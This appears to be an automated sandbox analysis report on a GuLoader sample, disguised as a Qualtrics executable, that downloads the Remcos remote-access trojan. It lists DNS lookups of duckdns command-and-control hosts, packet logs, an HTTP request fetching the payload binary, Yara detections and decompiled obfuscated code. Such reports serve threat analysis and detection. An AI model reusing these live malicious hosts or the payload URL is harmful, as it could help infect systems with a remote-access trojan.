              | MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaCyStr, __vbaVarTstLt, _CIsin, __vbaErase, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, __vbaR4Str, __vbaI2I4, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj |

              Version Infos

              | Description | Data |
              |---|---|
              | Translation | 0x0409 0x04b0 |
              | InternalName | Srklasse4 |
              | FileVersion | 1.04 |
              | CompanyName | Qualtrics |
              | Comments | Qualtrics |
              | ProductName | Qualtrics |
              | ProductVersion | 1.04 |
              | FileDescription | Qualtrics |
              | OriginalFilename | Srklasse4.exe |

              Possible Origin

              | Language of compilation system | Country where language is spoken | Map |
              |---|---|---|
              | English | United States | |

              Network Behavior

              Snort IDS Alerts

              | Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
              |---|---|---|---|---|---|---|---|
              | 09/27/21-14:57:47.315553 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 49958 | 8.8.8.8 | 192.168.2.7 |
              | 09/27/21-14:57:48.635027 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 50860 | 8.8.8.8 | 192.168.2.7 |

              TCP Packets

              Sep 27, 2021 14:57:48.262140036 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262166023 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262181044 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262187958 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262207031 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262217045 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262238979 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262239933 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262264013 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262264967 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262293100 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262320042 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262356997 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262381077 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262401104 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262433052 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262471914 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262490988 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262512922 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262533903 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262553930 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262557983 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262576103 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262599945 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262603045 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262633085 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262640953 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262667894 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262681007 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262698889 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262722015 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262746096 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262768030 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262816906 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262824059 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262845039 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262865067 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262872934 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262885094 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262907028 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262917042 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262928963 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262948990 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.262955904 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.262983084 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263019085 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263021946 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263061047 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263067007 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263087034 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263107061 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263139963 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263236046 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263262033 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263277054 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263298988 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263312101 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263320923 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263343096 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263364077 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263365030 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263391018 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263396978 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263415098 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263437033 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263438940 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263462067 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263483047 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263485909 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263509035 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263513088 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263531923 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263554096 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263554096 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263602018 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263658047 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263681889 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263704062 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263709068 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263758898 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263758898 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263783932 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263801098 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263839006 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263845921 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263881922 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263894081 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263923883 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.263952971 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.263978958 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264036894 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264038086 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.264060974 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264079094 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.264117956 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.264147997 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264172077 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264194965 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264194965 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.264213085 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.264225960 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.264257908 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.371248007 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371284008 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371545076 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.371772051 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371800900 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371824026 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371843100 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371861935 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371881962 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371896029 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.371905088 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371928930 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371952057 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371967077 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.371973038 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.371994972 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372015953 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372025013 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372082949 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372613907 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372637987 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372653961 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372697115 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372709990 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372714996 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372777939 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372798920 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372812033 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372816086 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372836113 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372855902 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372874975 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372878075 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372899055 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.372927904 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.372987986 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373106003 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373130083 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373150110 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373171091 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373191118 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373203993 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373212099 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373236895 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373258114 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373280048 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373320103 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373363018 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373389006 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373452902 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373454094 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373478889 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373500109 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373522997 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373523951 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373544931 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373589993 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373631001 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373656988 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373682022 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373718023 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373739958 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373754025 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373778105 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373800039 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373815060 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373819113 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373837948 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373857021 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373876095 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373919964 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.373986006 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.373986959 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374011040 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374031067 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374052048 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374068022 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374070883 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374092102 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374115944 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374138117 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374166012 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374243021 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374289036 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374308109 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374324083 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374346018 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374367952 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374368906 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374388933 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374411106 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374433041 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374481916 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374485970 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374509096 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374599934 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374618053 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374640942 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374660015 CEST804989223.146.242.85192.168.2.7
              Sep 27, 2021 14:57:48.374708891 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.374757051 CEST4989280192.168.2.723.146.242.85
              Sep 27, 2021 14:57:48.637094021 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:48.749043941 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:48.749847889 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:48.776447058 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:48.898894072 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:48.940921068 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:49.053284883 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:49.065982103 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:49.238023043 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:49.238194942 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:49.395836115 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:49.512489080 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:49.515093088 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:49.686646938 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:59.527451992 CEST11444989323.146.241.70192.168.2.7
              Sep 27, 2021 14:57:59.530904055 CEST498931144192.168.2.723.146.241.70
              Sep 27, 2021 14:57:59.699342012 CEST11444989323.146.241.70192.168.2.7

              UDP Packets


              DNS Queries

              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
              Sep 27, 2021 14:57:47.200725079 CEST | 192.168.2.7 | 8.8.8.8 | 0xd3d3 | Standard query (0) | dypage.duckdns.org | A (IP address) | IN (0x0001)
              Sep 27, 2021 14:57:48.519510984 CEST | 192.168.2.7 | 8.8.8.8 | 0xe898 | Standard query (0) | dyn-wave.duckdns.org | A (IP address) | IN (0x0001)

              DNS Answers

              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
              Sep 27, 2021 14:57:47.315552950 CEST | 8.8.8.8 | 192.168.2.7 | 0xd3d3 | No error (0) | dypage.duckdns.org | | 23.146.242.85 | A (IP address) | IN (0x0001)
              Sep 27, 2021 14:57:48.635026932 CEST | 8.8.8.8 | 192.168.2.7 | 0xe898 | No error (0) | dyn-wave.duckdns.org | | 23.146.241.70 | A (IP address) | IN (0x0001)

              HTTP Request Dependency Graph

              • dypage.duckdns.org

              HTTP Packets

              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              0 | 192.168.2.7 | 49892 | 23.146.242.85 | 80 | C:\Users\user\Desktop\DW1VgsgHNU.exe

              Timestamp | kBytes transferred | Direction | Data
              Sep 27, 2021 14:57:47.465127945 CEST | 8143 | OUT | GET /remcos_d_QUBXVO174.bin HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
              Host: dypage.duckdns.org
              Cache-Control: no-cache
              Sep 27, 2021 14:57:47.578341961 CEST | 8144 | IN | HTTP/1.1 200 OK
              Content-Type: application/octet-stream
              Last-Modified: Sun, 26 Sep 2021 08:30:43 GMT
              Accept-Ranges: bytes
              ETag: "119daccbb0b2d71:0"
              Server: Microsoft-IIS/8.5
              Date: Mon, 27 Sep 2021 12:57:47 GMT
              Content-Length: 469056


              Code Manipulations

              Statistics

              CPU Usage

              Memory Usage

              High Level Behavior Distribution

              Behavior

              System Behavior

              General

              Start time: 14:53:45
              Start date: 27/09/2021
              Path: C:\Users\user\Desktop\DW1VgsgHNU.exe
              Wow64 process (32bit): true
              Commandline: 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
              Imagebase: 0x400000
              File size: 184320 bytes
              MD5 hash: B30B9C1D23026FF24F234A07A557DC83
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: Visual Basic
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.499884696.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
              Reputation: low

              General

              Start time: 14:55:44
              Start date: 27/09/2021
              Path: C:\Users\user\Desktop\DW1VgsgHNU.exe
              Wow64 process (32bit): true
              Commandline: 'C:\Users\user\Desktop\DW1VgsgHNU.exe'
              Imagebase: 0x400000
              File size: 184320 bytes
              MD5 hash: B30B9C1D23026FF24F234A07A557DC83
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.767385154.0000000000948000.00000004.00000020.sdmp, Author: Joe Security
              Reputation: low

              Disassembly

              Code Analysis

                Executed Functions

                APIs
                • __vbaStrCopy.MSVBVM60 ref: 004230EE
                • __vbaAryConstruct2.MSVBVM60(?,00403C54,00000003), ref: 004230FF
                • #696.MSVBVM60(00403BC8), ref: 0042310A
                • __vbaStrCat.MSVBVM60(00403BDC,2:2), ref: 004238A8
                • __vbaStrMove.MSVBVM60 ref: 004238B5
                • __vbaStrCat.MSVBVM60(00403BE4,00000000), ref: 004238BD
                • __vbaStrMove.MSVBVM60 ref: 004238C4
                • #541.MSVBVM60(00689DCC,00000000), ref: 004238CB
                • __vbaStrVarMove.MSVBVM60(00689DCC), ref: 004238D5
                • __vbaStrMove.MSVBVM60 ref: 004238E0
                • __vbaFreeStrList.MSVBVM60(00000002,006460D0,006C3177), ref: 004238EC
                • __vbaFreeVar.MSVBVM60 ref: 004238FE
                • __vbaHresultCheckObj.MSVBVM60(00000000,003A6688,00402194,00000254), ref: 00423923
                • #692.MSVBVM60(?,knapstvlens,lysavisens), ref: 0042393F
                • __vbaVarTstNe.MSVBVM60(?,?), ref: 00423957
                • __vbaFreeVar.MSVBVM60 ref: 00423963
                • #648.MSVBVM60(?), ref: 00423980
                • __vbaFreeVar.MSVBVM60 ref: 00423989
                • __vbaNew2.MSVBVM60(00402634,0042B3B4), ref: 0042399D
                • __vbaHresultCheckObj.MSVBVM60(00000000,02B2E9BC,00402624,0000004C), ref: 004239C2
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403C20,00000028), ref: 004239E2
                • __vbaFreeObj.MSVBVM60 ref: 004239EB
                • __vbaNew2.MSVBVM60(00402634,0042B3B4), ref: 00423A03
                • __vbaHresultCheckObj.MSVBVM60(00000000,02B2E9BC,00402624,00000038,?,?,?,?,0000000A), ref: 00423A73
                • __vbaVar2Vec.MSVBVM60(?,0000000A,?,?,?,?,0000000A), ref: 00423A81
                • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,0000000A), ref: 00423A8F
                • __vbaFreeVar.MSVBVM60(?,?,?,?,0000000A), ref: 00423A98
                • __vbaFreeStr.MSVBVM60(00423B14), ref: 00423AEA
                • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00423AF8
                • __vbaFreeStr.MSVBVM60 ref: 00423AFD
                • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00423B11
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.499736142.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.499730880.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.499764903.000000000042B000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.499770029.000000000042D000.00000002.00020000.sdmp
                Similarity
                • API ID: __vba$Free$Move$CheckHresult$DestructNew2$#541#648#692#696Construct2CopyListVar2
                • String ID: dO$*^s$*cc$2:2$3to$5#$:Y-$>?$M'h$QZ`$SYPHILOPHOBIC$Yd%$k:$knapstvlens$lysavisens$w1l$=X
                • API String ID: 621974014-1160925713
                • Opcode ID: 7317fa0633ba80f212d070f45eea684accd05508d95c1b95bd48290d991f1925
                • Instruction ID: 14b7fb0d206b855dc8d9e2890887f1fb55dc232d21a98730a1675608f3f03196
                • Opcode Fuzzy Hash: 7317fa0633ba80f212d070f45eea684accd05508d95c1b95bd48290d991f1925
                • Instruction Fuzzy Hash: 115283B4A002498FCB04DFA8C588ADDFBF1BB48308F14C26AD9597B355C7B5594ACFA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 15%
                			_entry_() {
                				signed char _t63;
                				signed int _t64;
                				intOrPtr* _t66;
                				signed int _t67;
                				intOrPtr* _t68;
                				signed char _t69;
                				signed int _t70;
                				signed int _t71;
                				intOrPtr* _t72;
                				intOrPtr* _t73;
                				signed int _t75;
                				signed int _t76;
                				signed char _t78;
                				signed int _t80;
                				void* _t81;
                				signed char _t82;
                				intOrPtr* _t85;
                				intOrPtr* _t88;
                				intOrPtr* _t90;
                				signed int* _t91;
                				void* _t93;
                				void* _t94;
                				void* _t95;
                				intOrPtr* _t96;
                				intOrPtr* _t97;
                				void* _t100;
                				intOrPtr* _t102;
                				intOrPtr* _t106;
                				void* _t107;
                				signed int _t110;
                				void* _t125;
                				signed int _t126;
                				intOrPtr* _t128;
                				signed int _t132;
                				void* _t133;
                				intOrPtr* _t134;
                
                				_push("VB5!6&*"); // executed
                				L00401458(); // executed
                				 *_t63 =  *_t63 + _t63;
                				 *_t63 =  *_t63 + _t63;
                				 *_t63 =  *_t63 + _t63;
                				 *_t63 =  *_t63 ^ _t63;
                				 *_t63 =  *_t63 + _t63;
                				_t64 = _t63 - 1;
                				 *_t64 =  *_t64 + _t64;
                				 *_t64 =  *_t64 + _t64;
                				 *_t64 =  *_t64 + _t64;
                				 *_t64 =  *_t64 + _t93;
                				asm("cld");
                				_t66 = _t128;
                				asm("fsubr dword [esi+0x3d]");
                				 *_t66 =  *_t66 + _t66;
                				 *_t85 =  *_t85 + _t66;
                				 *_t66 =  *_t66 + _t66;
                				 *_t66 =  *_t66 + _t66;
                				 *((intOrPtr*)(_t66 + 0x71)) =  *((intOrPtr*)(_t66 + 0x71)) + _t80;
                				_push(cs);
                				_t67 = _t66 +  *((intOrPtr*)(_t85 + 0x52));
                				_t94 = _t93 + 1;
                				_push(_t94);
                				_t102 = _t100 + 2;
                				_t110 = _t107 - 0xffffffffffffffff;
                				 *_t102 =  *_t102 + _t67;
                				_t88 = _t85 + 1 - 1 + 1;
                				 *((intOrPtr*)(_t88 + 0x30e + _t110 * 2)) =  *((intOrPtr*)(_t88 + 0x30e + _t110 * 2)) + _t88;
                				 *_t67 =  *_t67 + _t67;
                				 *_t67 =  *_t67 ^ _t67;
                				_t132 = (_t64 |  *(_t93 + _t64 * 2 - 0x2b734eba)) +  *((intOrPtr*)(_t80 + 0x7e6e97a6));
                				if(_t132 <= 0) {
                					L3:
                					asm("rcl dword [ebx], cl");
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
                					 *_t67 =  *_t67 + _t67;
